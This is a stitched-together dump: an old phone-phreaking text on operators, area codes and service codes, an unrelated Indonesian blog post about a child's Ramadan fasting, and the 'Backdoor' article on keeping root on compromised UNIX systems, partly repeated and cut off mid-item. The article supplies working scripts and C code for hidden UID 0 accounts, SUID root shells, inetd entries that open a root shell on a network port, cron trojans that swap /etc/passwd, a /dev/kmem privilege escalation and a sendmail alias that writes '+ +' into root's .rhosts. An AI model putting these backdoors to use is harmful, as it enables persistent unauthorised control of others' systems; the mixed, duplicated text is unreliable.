///// Milliways 10mgs BBS...........[609]921-1994 O \\\\\\
\\\\\ 7 Gates of Hell BBS.................[415]697-1320 N //////
///// The Mordor AE 1200bps/Cat-Fur/10mg[201]528-6467 S \\\\\\
\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\**///////////////////////////////////////
/////////////////////////////////////**\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\\
PREFACE: In this issue will discuss the different types of operators, area
codes and special numbers. This edition is made to give you a basic
understanding of the wicked ways of MA. I hope it'll give you a good enough
back ground to do well. Look for Bell Hell vol. 2 for more info on hacking.
=-=-=-=-=
OPERATORS:
=-=-=-=-=
Here we'll go over in detail some of the most common operators.
TSPS OPERATOR:
Trafic (us) Service Position System Operator is the bitch you commonly here
whenever you use a pay phone etc. To say the least she's a meat head. Her
responsibilities are as follows:
[1] Getting all billing information for Calling Cards and 3rd number calls.
[2] Making sure you get the right person on person-to-person calls.
[3] Making sure the fool on the other end will pay for your collect call (why
call collect?)
[4] Identifying calling numbers, or basically asking you,
'what number are you calling, please.' when the system fucks up.
Even though these operators are commonly ding-bats, you shouldn't screw with
them, for they are known to be quick with the tracer. She can even tell if you
are calling from a fortress phone. She has a portable all time ready tracer.
Beware of these deadly bitches.
INWARD OPERATORS:
This wench is basically an apprentice to the bitch above (TSPS) or commonly
the '0' operator. She will never question you as long as you are within her
dimension (service) area. She can only be reached by a mighty Blue Box
(discussed in up and coming tutorial) or another operator.
DIRECTORY ASSISTANCE OPERATORS:
(DOA?DAO?)
This is the operator you get when you call directory assistance (555-1212).
All she can do is either tell you a listed number or tell you if a number is
unlisted. Waste of time.
DEAF D.A.O.'S
This neat little operator is set up to help with directory assistance for deaf
people (who would they want to talk to?). She's reachable by dialing
800-855-1155. She talks to the deaf via Teletypewriters (terminals). If your
modem can transfer baudot (Oh those sweet Apple Cats can) then you can talk to
her. You might find her alot more friendly, more talkitive, and alot easier to
manipulate a number out of. However, she does use abbreviations like GA for go
ahead (pretty tricky huh).
CN/A OPERATORS
Oh the sweet CN/A, god bless its soul. These operators instead of giving you
information on a persons phone number, they give you information on a phone
numbers person (the person at 503-229-7600). However, if manipulated these
beauties can give you the number for an unlisted phone number (the number),
they have all kinds of access. This topic is discussed later in this tutorial.
INTERCEPT OPERATOR:
All places have their share of low lifes, well this is the scum, bottom of the
barrel of operators. She's the one you get when all the recordings are busy
(lower than a recording). Infact these dames can cause you more pains then a
recording. They only know a handful of english (around two sentences) and can
barely even say those. Even though they have no clue to what a trace is,
unless you know their native tongue, and then doubtfully, their just a pain in
the butt to deal with.
OTHER OPERATORS:
Well we have - marine verify, mobile, route and rate, ship to shore,
conference and a few other specific ones. No real help to us now.
*NOTES: Most operators have their own little Directory Assistance. If any
operator is giving you probs ask to speak with his/her/its supervisor. This
will freak them out. In rare loveable cases you might find a nice operator
with a number like (503-123-4567). Whenever you find a 0 or 1 in the 4th
number slot then you know need a Blue Box. It'll give you special access to
those hard to get wenches.
=-=-=-=-=-=-=-=
AREA CODES ETC.
=-=-=-=-=-=-=-=
HOW PHONE NUMBERS WORK:
Basiclly MA made our phone numbers quite simple. Here's how they work:
[A] The area code is what the call a three digit number plan area or NPA. This
means that an area code is just that, the code for an area.
[B] The rest of our number (ie. 666-7209) is divided into two segments. The
first being the Central Office number (666 would be N. Portland) and the
ending (7209) is the station number, or basically your assigned home number.
This complete combination (503-666-7209) is known as the destination code.
Here's how MA has developed the combo's:
[NPA] [TELEPHONE NUMBER]
X*Y XYY-YYYY
X = a number from 2-9
y = a number from 0-9
* = either 0 or 1
Normally an area code may never cross a states boundry, thus an area code
(NPA) may not be used for both New York and for Pennsylvania. However, as for
all other rules there is an exception. Here they are.
SPECIAL AREA CODES:
(SACS)
510 - TWX (USA)
610 - TWX (CANADA)
700 - NEW SERVICE
710 - TWX (USA)
800 - WATTS LINES
810 - TWX (USA)
900 - DIAL-IT SERVICES
910 - TWX (USA)
The explanations of these are as follows:
TWX:
Telex II, as you can see above there are 5 TWX machines. They are all owned by
Western Union. Normally these babes may only be accessed by other TWX
machines, however, if you do not wish to go and purchase one you can access
them by use of the Easylink, by Western Union. For more on this I would
suggest reading The Bioc Agents, and Tucs article on 'Hacking Western Union's
Easylink.'
700:
This is a new service for employees of AT&T in which someone (one of the
special employees) can call his own 700 number (say 700-292-9876), enters
his/her code, and where he is staying and then hangs up. If there is any new
info on the case he is working on, the computer will call him back and tell
him all the latest updates.
800:
There are basically two types of Watts Lines, Inward Watts and Outward watts.
These are probably some of the nicest of the special area codes since they
allow you to call for free. Here's an explanation of the two:
INWARD WATTS:
Inward Wide Area Telecommunications Service is probably the one your most
familiar with. MA has developed it so there are 6 different levels of Inwatts.
Level 6 being the whole U.S. (all 50 states) level 5 being all 48 contienental
states etc. all the way down to 1, only one state. Usually a company will get
a level 6 and then a level 1 because all though level 6 allows you to call
from anywhere in the U.S. it excludes the state where the call is terminated
at, so the company usually buys a level 1 for that state.
Interstate Inwatts are less common but still exist. These are the ones you can
only call from say one state. You can tell one quite easily for they all have
a 2 for the last central office number, or the 6th number (ie. 800-XY2-XXXX).
All companies that have an 800# must have at least two lines. This is because
if you call the first number (ie. 800-666-0190) and it rings busy the 800#
number will always go to another port to see if its busy. Inwatts customers
are billed by the hour instead of month like us.
OUTWARD WATTS:
Outwatts are just that, there for making outward calls only. Large companies
commonly use Outwatts since they recieve bulk discounts. Outwatt 800's are in
the form of:
800-*XX-XXXX
* may only be a 0 or 1 and can only be reached by way of box. The whole set,
*XX is the areas that are accessable by that comany.
900:
This is a nation number used for taking polls and the like (How do you think
they know what shows on the tube are k00l). The number for this service is,
900-555-1212. This will tell whats up on the system. Beware, this MA trick
will cost you 50 cents a minute, and 35 cents there after (ever heard of MA
being cheap?).
=-=-=-=-=
CO CODES
=-=-=-=-=
These are the way the switching office knows where to route the call. The
following codes are reserved nationwide:
555 - directory assistance
950 - future use
958 - plant test
959 - plant test
976 - dial-it services (weather etc.)
950:
This includes all special service. Heres a list of a few:
1000 - SPC
1022 - MCI Execunet
1033 - US Telephone
1044 - Allnet
1088 - SBS Skyline
*NOTE: These beauts are free from fortresses.
958,959:
These consist of ANI, Ringback and some other MA tests.
976:
Check this one out. Simply dial 976-1000. Alot of BBSs around will probably
have a more complete listing of these services.
=-=-=-=-=
N11 CODES:
=-=-=-=-=
I'm not sure which one of these are still in service. Basically MA wants to
dump these services, but alot are still in use, it'll vary with your area.
011 - international dialing prefix
211 - coin refund operator
411 - directory assistance
611 - repair service
811 - business office
911 - EMERGENCY
Downloaded From P-80 Systems 304-744-2253
Saturday, August 6, 2011
hari ke-6
sekarang hari ke-6 ramadhan,
well... kalo anda lihat picture disamping anda akan melihat hari pertama hingga hari ke 5 agustus sebagian tertutupi bintang.
well.. itu menandakan hari-hari dimana mujib puasa sejak awal ramadhan. gambar bintang menunjukkan bahwa hari itu mujib "puasa" penuh. ya paling tidak mujib ikut sahur dan buka bersama... saya sendiri gak tahu apa ia benar-benar menahan makan & minum seharian.
well... gambar bintang itu merupakan reward atas ide-nya mbak iis. kalo mujib berpuasa satu hari penuh maka ia akan mendapat bintang pada hari itu, kalo gak puasa penuh alias ketahuan makan/minum ya.. nggak dapat bintang-lah tentunya.
dari semenjak kecil memang baiknya anak-anak diajari hal-hal yang baik, dan tentunya dengan metode yang menarik minat anak-anak.. dan tidak semua anak dapat dibujuk dengan metode yang sama, karena tiap anak adalah spesial dan memiliki karakter yang berbeda-beda.
well.. sekian report saya... semoga bisa menjadi ide bagi para ibu yang ingin mendidik anaknya sejak kecil.
Backdoor
Ok..... You've been at it for all night. Trying all the exploits you can think of. The system seems tight. The system looks tight.
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!
After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.
From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever
wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your
system?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
evil 22/tcp evil
and this line to /etc/inetd.conf:
evil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is.
#daemon9@netcom.com
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/sneakysneaky_passwd
make sure this exists:
#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#daemon9@netcom.com
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* daemon9@netcom.com */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
to the /etc/aliases file. Usally, you would then create a uuencoded .rhosts file with the full pathname embedded.
#! /bin/csh
# Create our .rhosts file. Note this will output to stdout.
echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25. Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file. For a one liner (not faked, however) do this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com
You can be as creative as you wish in this case. You can setup an alias that, when mailed to, will run a program of your
choosing. Many of the previous scripts and methods can be employed here.
The Covert
[10] Trojan code in common programs. This is a rather sneaky method that is really only detectable by programs such tripwire.
The idea is simple: insert trojan code in the source of a commonly used program. Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification. Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring. (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan;
else if input is valid, continue;
else quit with error;
...
Not complex or difficult. Trojans of this nature can be done in less than 10 lines of additional code.
The Esoteric
[11] /dev/kmem exploit. It represents the virtual of the system. Since the kernel keeps it's parameters in memory, it is possible
to modify the memory of the machine to change the UID of your processes. To do so requires that /dev/kmem have read/write
permission. The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID. The following program does just that.
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to 0. */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by daemon9@netcom.com */
#include
#include
#include
#include
#include
#include
#include
#define KEYWORD "nomenclature1"
struct user userpage;
long address(), userlocation;
int main(argc, argv, envp)
int argc;
char *argv[], *envp[];{
int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR);
if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv);
exit(10);
}
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(20);
}
count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n");
perror(argv);
exit(30);
}
printf("Current UID: %d\n",userpage.u_ruid);
printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0;
userpage.u_rgid=0;
where=lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n");
perror(argv);
exit(40);
}
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
}
}
} /* End main */
#include
#include
#include
#define LNULL ((LDFILE *)0)
long address(){
LDFILE *object;
SYMENT symbol;
long idx=0;
object=ldopen("/unix",LNULL);
if(!object){
fprintf(stderr,"Cannot open /unix.\n");
exit(50);
}
for(;ldtbread(object,idx,&symbol)==SUCCESS;idx++){
if(!strcmp("_u",ldgetname(object,&symbol))){
fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value);
ldclose(object);
return(symbol.n_value);
}
}
fprintf(stderr,"Cannot read symbol table in /unix.\n");
exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this. My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say 5 minutes) and then restore the original permissions. You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for 5 minutes
chmod 600 /dev/kmem # Or whatever it was before
From The Infinity Concept Issue II
The system *is* tight. You've tried everything. Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on... Nothing. WAIT! What's that!?!? A "#" ???? Finally!
After seeming endless toiling, you've managed to steal root. Now what? How do you hold onto this precious super-user
privilege you have worked so hard to achieve....?
This article is intended to show you how to hold onto root once you have it. It is intended for hackers and administrators alike.
From a hacking perspective, it is obvious what good this paper will do you. Admin's can likewise benefit from this paper. Ever
wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your
system?
This list is BY NO MEANS comprehensive. There are as many ways to leave backdoors into a UNIX computer as there are
ways into one.
Beforehand
Know the location of critical system files. This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me...). Familiarity with passwd file formats (including general 7 field
format, system specific naming conventions, shadowing mechanisms, etc...). Know vi. Many systems will not have those
robust, user-friendly editors such as Pico and Emacs. Vi is also quite useful for needing to quickly seach and edit a large file. If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer. This will come in handy if you want to cut and paste code, rc files, shell scripts, etc...
The permenance of these backdoors will depend completely on the technical saavy of the administrator. The experienced and
skilled administrator will be wise to many (if not all) of these backdoors. But, if you have managed to steal root, it is likely the
admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come. One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors.
The Overt
[1] Add a UID 0 account to the passwd file. This is probably the most obvious and quickly discovered method of rentry. It
flies a red flag to the admin, saying "WE'RE UNDER ATTACK!!!". If you must do this, my advice is DO NOT simply
prepend or append it. Anyone causally examining the passwd file will see this. So, why not stick it in the middle...
#!/bin/csh
# Inserts a UID 0 account into the middle of the passwd file.
# There is likely a way to do this in 1/2 a line of AWK or SED. Oh well.
# daemon9@netcom.com
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
echo passwd file has $linecount[1] lines.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
echo Creating two files, $linecount[1] lines each \(or approximately that\).
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
NEVER, EVER, change the root password. The reasons are obvious.
[2] In a similar vein, enable a disabled account as UID 0, such as Sync. Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin. Change her UID to 0 (and remove the '*' from the second
field).
[3] Leave an SUID root shell in /tmp.
#!/bin/sh
# Everyone's favorite...
cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that...
chmod 4755 /tmp/.evilnaughtyshell
Many systems run cron jobs to clean /tmp nightly. Most systems clean /tmp upon a reboot. Many systems have /tmp mounted
to disallow SUID programs from executing. You can change all of these, but if the filesystem starts filling up, people may
notice...but, hey, this *is* the overt section....). I will not detail the changes neccessary because they can be quite system
specific. Check out /var/spool/cron/crontabs/root and /etc/fstab.
The Veiled
[4] The super-server configuration file is not the first place a sysadmin will look, so why not put one there? First, some
background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives. The format of the /etc/inetd.conf file is simple. Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7)
ftp stream tcp nowait root /usr/etc/ftpd ftpd
talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services. This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with. (2) tells inetd which type of socket connection the daemon will expect.
TCP uses streams, and UDP uses datagrams. Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP. Field (4) specifies whether or not the daemon is iterative or concurrent. A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait. 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections. Field (5) is the user (or more
inportantly, the UID) that the daemon is run as. (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments). If the program is trivial (usally requiring no user interaction) inetd may handle it internally.
This is done with an 'internal' flag in fields (6) and (7).
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else. A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc...
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor. Find the line that reads:
daytime stream tcp nowait root internal
and change it to:
daytime stream tcp nowait /bin/sh sh -i.
You now need to restart /etc/inetd so it will reread the config file. It is up to you how you want to do this. You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to do this off peak hours).
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice. One
simple solution is to set up a shell the runs similar to the above backdoor. You need to make sure the entry appears in
/etc/services as well as in /etc/inetd.conf. The format of the /etc/services file is simple:
(1) (2)/(3) (4)
smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service. For instance, add this line to /etc/services:
evil 22/tcp evil
and this line to /etc/inetd.conf:
evil stream tcp nowait /bin/sh sh -i
Restart inetd as before.
Note: Potentially, these are a VERY powerful backdoors. They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet.
[6] Cron-based trojan I. Cron is a wonderful system administration tool. It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root... Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last. /var/spool/cron/crontabs/root is where root's list for crontabs is usally located. Here, you have
several options. I will list a only few, as cron-based backdoors are only limited by your imagination. Cron is the clock daemon.
It is a tool for automatically executing commands at specified dates and times. Crontab is the command used to add, remove,
or view your crontab entries. It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab. A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
0 0 * * 1 /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6). Field (6) is the command (or shell script) to execute. The above shell script is executed on Mondays. To exploit cron,
simply add an entry into /var/spool/crontab/root. For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID 0 account we previously added, and add him if he is missing, or do nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your
shady intentions). Add this line to /var/spool/crontab/root:
0 0 * * * /usr/bin/trojancode
This is the shell script:
#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is.
#daemon9@netcom.com
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home.
cp /etc/passwd ./temppass # Safety first.
@ linecount[1] /= 2
@ linecount[1] += 1 # we only want 2 temp files
split -$linecount[1] ./temppass # passwd string optional
echo "EvilUser::0:0:Mr. Sinister:/home/sweet/home:/bin/csh" >> ./xaa
cat ./xab >> ./xaa
mv ./xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm ./xa* ./temppass
echo Done...
else
endif
[7] Cron-based trojan II. This one was brought to my attention by our very own Mr. Zippy. For this, you need a copy of the
/etc/passwd file hidden somewhere. In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing. We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!).
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok. Add this line to root's crontab file:
29 2 * * * /bin/usr/sneakysneaky_passwd
make sure this exists:
#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky
and this is the simple shell script:
#!/bin/csh
# Install trojan /etc/passwd file for one minute
#daemon9@netcom.com
cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd
sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan. Simple idea. Instead of a shell script, have some nice C code to obfuscate the effects. Here it is.
Make sure it runs as root. Name it something innocous. Hide it well.
/* A little trojan to create an SUID root shell, if the proper argument is
given. C code, rather than shell to hide obvious it's effects. */
/* daemon9@netcom.com */
#include
#define KEYWORD "industry3"
#define BUFFERSIZE 10
int main(argc, argv)
int argc;
char *argv[];{
int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part. */
system("cp /bin/csh /bin/.swp121");
system("chown root /bin/.swp121");
system("chmod 4755 /bin/.swp121");
}
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something... */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */
for(;i<10;i++){
fprintf(stderr,".");
sleep(1);
}
printf("\nDone.\n");
return(0);
} /* End main */
[9] The sendmail aliases file. The sendmail aliases file allows for mail sent to a particular username to either expand to several
users, or perhaps pipe the output to a program. Most well known of these is the uudecode alias trojan. Simply add the line:
"decode: "|/usr/bin/uudecode"
